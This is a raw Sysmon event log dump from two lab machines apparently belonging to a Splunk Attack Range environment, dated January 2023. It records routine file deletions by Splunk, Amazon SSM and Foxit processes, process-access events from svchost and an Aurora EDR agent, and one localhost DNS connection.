12:17:00.939{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000039769Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.426{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=C6EB18D154C15A9ED0650867DAC06EB2,SHA256=1E444FD06C160D57253A0AC6D72AD20932FCA663D0C2240731F403C944F7A23E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039768Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.332{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A34598DFD6D481F3D0B68D8A628C88FB,SHA256=8C19C07816D894A6F6F88F8A6A5C898829EFDE80522E02E5346D27E18D9CC74A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015082Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:00.934{E5A8D418-DCC0-63C7-9F00-00000000B002}3096NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\spool\splunk\tracker.logMD5=2AD7889BB42D940CE29348848EA97A9F,SHA256=5DAE8CDA0FC55A83CF9F652D8897B07BDBECCE04F9C5469CF42F5D50BF8E4FEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015081Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:00.224{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E208B5344057493C5D6F2951FEB1A259,SHA256=3A2922BBB1268310397FB0B87B44D17FDF356ACD5F01F685651F8508BD7F303A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000039807Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:01.783{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B1BBC4FB0EF380D1FC2C893A40A08568,SHA256=317F64AB78ED67A7CE803A1CA5A2B19B3AD030477B3CFF1A1EFCC8E4BA2E0285,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039806Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:01.401{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=5DEFC9D22F0CAE64193DBB54D30BECBA,SHA256=F357A07A8C873A10062DC9D43FCD3998EB67BAAB0F7C4CA1D3EE90CE47A7F655,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039805Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:01.385{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=FA72170AA2DDBEF80E2E6565EB4401C1,SHA256=3385FADBDF5CB928EB7049B54A865D5DB3695E98914FFE9BF4FDE9EA6D039A40,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039804Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:01.385{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=AEDB57ABDC32AD7869684E162401FEE7,SHA256=4B3CE250F83984DB09E8995E601159ED97F31F2062A32644AA021B2D06A2CDF1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039803Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:01.370{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=2B1FF1B61139A3BCE42A6FB0326558A1,SHA256=0ADA21EE6F5155BD00820959A82030814D7C472D00689D9E20B9BEB4C8FE03DC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015084Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:01.831{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\respondent-20230118114719-028MD5=2BA10D7196373860DD67B47CDBC7ACF2,SHA256=36B87809E8BE9B960CE5E03B4CEC64D52EF7C46D9877F9C3402AB54869FC5CBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000015083Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:01.309{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=96E4DF8F0A4A6CDF93B3E3F45EDCA1E7,SHA256=4995279B9A857221457B0275ED5E5EE9DF37D1AB51B17EC44BF7147126A56116,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000039802Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:01.276{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832284C:\Windows\system32\svchost.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000039801Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:01.276{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=D3C30A1BF2CFDB5EC6D2940125B16C0F,SHA256=9E05FB7BE9E00C74D38273AA8748AD6E78B2999626D5A79A4D704365270A22AD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039800Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:01.276{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=C70088275245A7C3D68E85B6BAF8A41B,SHA256=BCA4727E5B0CDBB8DE78CB3138D15D5BBCBFECD83D8E01AFFB3790B6FB76563E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000039799Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:01.260{FE4C2B44-E326-63C7-F905-00000000AF02}3260ATTACKRANGE\AdministratorC:\Program Files (x86)\Foxit Software\Foxit PDF Reader\FoxitPDFReader.exeC:\Users\Administrator\AppData\Roaming\Foxit Software\Foxit PDF Reader\StartPage 12.1.0\Advertisement\ad.db-journalMD5=5A74691BB2D63F99E2613172A6752D7C,SHA256=C10BD055921B31D7678E10BE917609EDA9FD5095F13F0F1D885F94764971A875,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000039809Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:00.780{FE4C2B44-DA03-63C7-2700-00000000AF02}2624C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-ctus-attack-range-271.attackrange.local63763- 23542300x800000000000000039808Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:02.495{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A729AE8E2EBC87DE697B5D231EC826B,SHA256=2CDFB477138CB97662EAB699F03AA4497A6A009F90A3395F43791A215F963C7A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015117Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.833{E5A8D418-DC44-63C7-1B00-00000000B002}1944NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0027b8f3633f25268\channels\health\surveyor-20230118114717-029MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000015116Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.763{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015115Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.761{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015114Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.760{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015113Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.754{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015112Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.750{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015111Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.749{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015110Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.749{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015109Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.745{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015108Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.744{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015107Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.742{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015106Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.741{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015105Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.732{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015104Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.728{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015103Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.726{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015102Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.719{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015101Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.717{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015100Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.708{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015099Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.705{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000012C38610) 10341000x800000000000000015098Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:02.680{E5A8D418-DC44-63C7-1C00-00000000B002}20202328C:\Program 